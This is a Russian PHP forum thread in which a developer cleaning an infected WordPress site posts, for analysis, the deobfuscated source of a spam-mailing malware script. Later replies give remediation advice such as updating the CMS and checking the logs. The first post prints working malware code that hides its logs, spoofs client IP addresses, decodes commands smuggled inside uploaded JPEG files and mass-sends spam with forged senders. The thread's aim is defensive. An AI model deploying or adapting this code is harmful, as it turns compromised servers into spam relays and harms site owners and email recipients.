PHP.SU

Программирование на PHP, MySQL и другие веб-технологии

PHP.SU Портал

Главная

Помощь

Поиск

Поиск Яндекс Вакансии

Пользователи

Здравствуйте, Гость

( Вход · Регистрация · Правила форума )

Забыли пароль?

Что он делает?

Форумы портала PHP.SU » PHP » Программирование на PHP » CMS и фреймворки (Модераторы: OrmaJever, Саныч)

Страниц (1): [1]

Без описания

Поиск в теме | Версия для печати

MikaBi	Отправлено: 10 Сентября, 2015 - 21:06:10
Новичок Покинул форум Сообщений всего: 21 Дата рег-ции: Июнь 2014 Помог: 0 раз(а)	Привет всем! Давно тут не был) В общем, дело такое: на сайте заказчика вирус, сайт на wordpress, но это по сути не так важно, потому, что до момента поиска уязвимости еще далеко. Ну, то есть я конечно сделал все стандартные действия- убил все левые плагины, сравнил оригинал вордпресса с текущим, прогнал сайт несколькими плагинами по выявлению вредоносного кода, прогнал "айболитом" и т.д. В итоге начистил гору вредоносов, но безрезультатно - они появляются вновь. Что делает вирус. Он спамит через email, за что хостер отрубил возможность отправлять письма. Но это тоже к сути моего вопроса отношения не имеет. Вредоносный код обычно появляется во всяких потаенных местах, типа css папок, всяких глубоких папок js каких-то плагинов и т.д. Выглядит как, либо абракадабра (dffr32.php), либо маскируется под какие-то нужные файлы (template.php). Сам код обфусцирован несложно довольно-таки, потому я его привел в божеский вид и пытаюсь понять как именно он все делает. Пока я понял только, что он проверяет наличие $_FILES, перебирает его и если находит там любой файл кроме jpg то меняет его имя определенным образом. Ну и по мелочи там- имя хоста и т.д. Затем идет огромный кусок кода, это класс phpMailer прямо с комментариями даже с гитхаба) Этот кусок я пропустил и не буду показывать сейчас потому что он огромен и 100% это чистый phpmailer , а после уже идет опять код зловреда, где он уже и собственно отправляет спам. Но я не могу понять момента, где он берет сам список спама, список адресов куда слать и т.д. Может кто-то из уважаемого сообщества заинтересуется и посмотрит код? Он очень интересный, между прочим) В общем, любые соображения приветствуются. Злой код Спойлер (Отобразить) CODE (htmlphp): скопировать код в буфер обмена <?php @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @set_time_limit(0); if(isset($_SERVER)) { $_SERVER['PHP_SELF'] = "/"; $_SERVER['REMOTE_ADDR'] = "127.0.0.1"; if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1"; } } if(isset($_FILES)) { foreach($_FILES as $key => $file) { if(!strpos($file['name'], ".jpg")) { $filename = alter_macros($file['name']); $filename = num_macros($filename); $filename = xnum_macros($filename); $_FILES[$key]["name"] = $filename; } } } function custom_strip_tags($text) { $text = strip_tags($text, ''); $text = str_replace("", "", $text); $text = str_replace("\">", " ] ", $text); return $text; } function is_ip($str) { return preg_match("/^([1-9]\|[1-9][0-9]\|1[0-9][0-9]\|2[0-4][0-9]\|25[0-5])(\.([0-9]\|[1-9][0-9]\|1[0-9][0-9]\|2[0-4][0-9]\|25[0-5])){3}$/",$str); } function from_host($content) { $host = preg_replace('/^(www\|ftp)\./i','',@$_SERVER['HTTP_HOST']); if (is_ip($host)) { return $content; } $tokens = explode("@", $content); $content = $tokens[0] . "@" . $host . ">"; return $content; } function alter_macros($content) { preg_match_all('#{(.)}#Ui', $content, $matches); for($i = 0; $i < count($matches[1]); $i++) { $ns = explode("\|", $matches[1][$i]); $c2 = count($ns); $rand = rand(0, ($c2 - 1)); $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content); } return $content; } function xnum_macros($content) { preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches); for($i = 0; $i < count($matches[0]); $i++) { $num = $matches[1][$i]; $min = pow(10, $num - 1); $max = pow(10, $num) - 1; $rand = rand($min, $max); $content = str_replace($matches[0][$i], $rand, $content); } return $content; } function num_macros($content) { preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches); for($i = 0; $i < count($matches[0]); $i++) { $min = $matches[1][$i]; $max = $matches[2][$i]; $rand = rand($min, $max); $content = str_replace($matches[0][$i], $rand, $content); } return $content; } function fteil_macros($content, $fteil) { return str_replace("[FTEIL]", $fteil, $content); } //ТУТ ВСТАВКА С PHPmailer function sendSmtpMail($from_email, $from_name, $to, $subject, $body, $type, $config_file) { $mail = new PHPMailer(); $mail->isMail(); $mail->CharSet = 'utf-8'; $mail->SetFrom($from_email, $from_name); $mail->AddAddress($to); $mail->Subject = $subject; if ($type == "1") { $mail->MsgHTML($body); } elseif ($type == "2") { $mail->isHTML(false); $mail->Body = $body; } if (isset($_FILES)) { foreach($_FILES as $key => $file) { if ($file['tmp_name'] != $config_file) { $mail->addAttachment($file['tmp_name'], $file['name']); } } } if (!$mail->send()) { $to_domain = explode("@", $to); $to_domain = $to_domain[1]; $mail->IsSMTP(); $mail->Host = mx_lookup($to_domain); $mail->Port = 25; $mail->SMTPAuth = false; if (!$mail->send()) { return $mail->ErrorInfo; } else { return 0; } } else { return 0; } } if (isset($_FILES)) { foreach($_FILES as $key => $file) { if(strpos($file['name'], ".jpg")) { $res = type1_send($file['tmp_name']); if ($res) { echo $res; } } } } function mx_lookup($hostname) { @getmxrr($hostname, $mxhosts, $precedence); if(count($mxhosts) === 0) return '127.0.0.1'; $position = array_keys($precedence, min($precedence)); return $mxhosts[$position[0]]; } function myhex2bin( $str ) { $sbin = ""; $len = strlen( $str ); for ( $i = 0; $i < $len; $i += 2 ) { $sbin .= pack( "H", substr( $str, $i, 2 ) ); } return $sbin; } function decode($data, $key) { $out_data = ""; for ($i=0; $i<strlen($data);) { for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++) { $out_data .= chr(ord($data[$i]) ^ ord($key[$j])); } } return $out_data; } function type1_send($config_file) { $data = file_get_contents($config_file); $start_pos = strpos($data, myhex2bin("ffda")); if ($start_pos) { $start_pos += (20); $end_pos = strrpos($data, myhex2bin("ffd9")); if ($end_pos) { $data = substr($data, $start_pos, $end_pos); } else { return FALSE; } } else { return FALSE; } $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; $data = decode($data, $key); $data = @unserialize($data); if (!$data \|\| !isset($data['ak'])) { return FALSE; } if ($data['ak'] != "fa9bde3e-fe57-4dd7-9cba-5a1ed8f8f3cf") { exit(); } if (isset($data['c'])) { $res["r"]["c"] = $data['c']; return base64_encode(serialize($res)); } $good = 0; $bad = 0; $last_error = 0; foreach ($data['e'] as $uid=>$email) { $theme = $data['s'][array_rand($data['s'])]; $theme = alter_macros($theme); $theme = num_macros($theme); $theme = xnum_macros($theme); $message = $data['l']; $message = alter_macros($message); $message = num_macros($message); $message = xnum_macros($message); $message = fteil_macros($message, $uid); $from = $data['f'][array_rand($data['f'])]; $from = alter_macros($from); $from = num_macros($from); $from = xnum_macros($from); if (strstr($from, "[CUSTOM]") == FALSE) { $from = from_host($from); } else { $from = str_replace("[CUSTOM]", "", $from); } $from_email = explode("<", $from); $from_email = explode(">", $from_email[1]); $from_name = explode("\"", $from); $last_error = sendSmtpMail($from_email[0], $from_name[1], $email, $theme, $message, $data['l t'], $config_file); if ($last_error === 0) { $good++; } else { $bad++; $good = count($data['e']) - $bad; } } $res["r"]["e"] = $last_error === FALSE ? 0 : $last_error; $res["r"]["g"] = $good; $res["r"]["b"] = $bad; return base64_encode(serialize($res)); } ?> Этот код содержится практически во всех зараженных файлах, и везде он одинаков. Но, должен сказать, что попадается еще один вид кода, который я пока не смог толком деобфусцировать. Если кому-то станет интересно - выложу в "грязном" виде. Всем спасибо.

Мелкий	Отправлено: 10 Сентября, 2015 - 21:52:45
Активный участник Покинул форум Сообщений всего: 11926 Дата рег-ции: Июль 2009 Откуда: Россия, Санкт-Петербург Помог: 618 раз(а)	MikaBi пишет: сайт на wordpress MikaBi пишет: сделал все стандартные действия ... MikaBi пишет: они появляются вновь. Почему в стандартных действиях не указано "обновил до актуальной, поддерживаемой версии саму CMS и все плагины"? ----- PostgreSQL DBA

MikaBi	Отправлено: 10 Сентября, 2015 - 22:33:15
Новичок Покинул форум Сообщений всего: 21 Дата рег-ции: Июнь 2014 Помог: 0 раз(а)	Мелкий пишет: MikaBi пишет: сайт на wordpress MikaBi пишет: сделал все стандартные действия ... MikaBi пишет: они появляются вновь. Почему в стандартных действиях не указано "обновил до актуальной, поддерживаемой версии саму CMS и все плагины"? Ну, потому, что это настолько кристально ясно, что я даже не стал "засорять эфир" этой информацией. Конечно обновил в первую очередь.

Viper	Отправлено: 10 Сентября, 2015 - 23:34:40
Активный участник Покинул форум Сообщений всего: 4555 Дата рег-ции: Февр. 2007 Откуда: Симферополь Помог: 98 раз(а)	Логи сервера смотреть не судьба? Как минимум mail relay запретить. К прочтению https://codex[dot]wordpress[dot]org/FAQ_[dot][dot][dot]_site_was_hacked PS! Вы хотели узнать что делает скрипт? Или как от него избавиться? ----- Список фильмов с описанием, блекджеком и... для Joomla? -> https://киноархив[dot]com Демо нового движка для сайта php.su -> php[dot]su, проект на гитхабе

MikaBi	Отправлено: 11 Сентября, 2015 - 07:32:10
Новичок Покинул форум Сообщений всего: 21 Дата рег-ции: Июнь 2014 Помог: 0 раз(а)	Viper пишет: Логи сервера смотреть не судьба? Как минимум mail relay запретить. К прочтению https://codex[dot]wordpress[dot]org/FAQ_[dot][dot][dot]_site_was_hacked PS! Вы хотели узнать что делает скрипт? Или как от него избавиться? В логах идет ежеминутное обращение к 2 - 3 вредоносным файлам. Если файлы удалить, то продолжает долбиться в 404 несколько дней. Момент дропа новых файлов пока отследить не могу, но буду стараться. Ну, само собой финальная цель - избавиться, а если точнее, то закрыть уязвимость. Но и понять принцип действия от начала до конца тоже хочется.

DlTA	Отправлено: 11 Сентября, 2015 - 08:37:27
Постоянный участник Покинул форум Сообщений всего: 2952 Дата рег-ции: Окт. 2010 Помог: 53 раз(а)	MikaBi пишет: Но и понять принцип действия от начала до конца тоже хочется. вам на хост заливают сторонние файлы, как?! может зная ваши пароли, или через дырки WP или где то лежит шелл или хостер у вас гуано и позволяет заглядывать в соседние папки и не только

MikaBi	Отправлено: 11 Сентября, 2015 - 21:30:29
Новичок Покинул форум Сообщений всего: 21 Дата рег-ции: Июнь 2014 Помог: 0 раз(а)	DlTA пишет: MikaBi пишет: Но и понять принцип действия от начала до конца тоже хочется. вам на хост заливают сторонние файлы, как?! может зная ваши пароли, или через дырки WP или где то лежит шелл или хостер у вас гуано и позволяет заглядывать в соседние папки и не только Все омрачается тем, что не я владелец сайта. И хотя я сменил все пароли на просто совершенно надежные, но не могу гарантировать, что например у заказчика нет троянов и кйлогеров каких-нибудь на машине с которой он ходит в админку и т.д. Хостер TimeWeb, вроде не совсем уж днище. Сейчас, когда в очередной раз все почистил, буду построчно мониторить логи, что бы отловить обращение к шеллу, других вариантов не вижу пока.

higub	Отправлено: 04 Декабря, 2015 - 16:51:20
Новичок Покинул форум Сообщений всего: 56 Дата рег-ции: Нояб. 2015 Помог: 0 раз(а) [+]	не знаю но посмотрю

Поиск в теме | Версия для печати

Страниц (1): [1]

Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)

« CMS и фреймворки »

Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.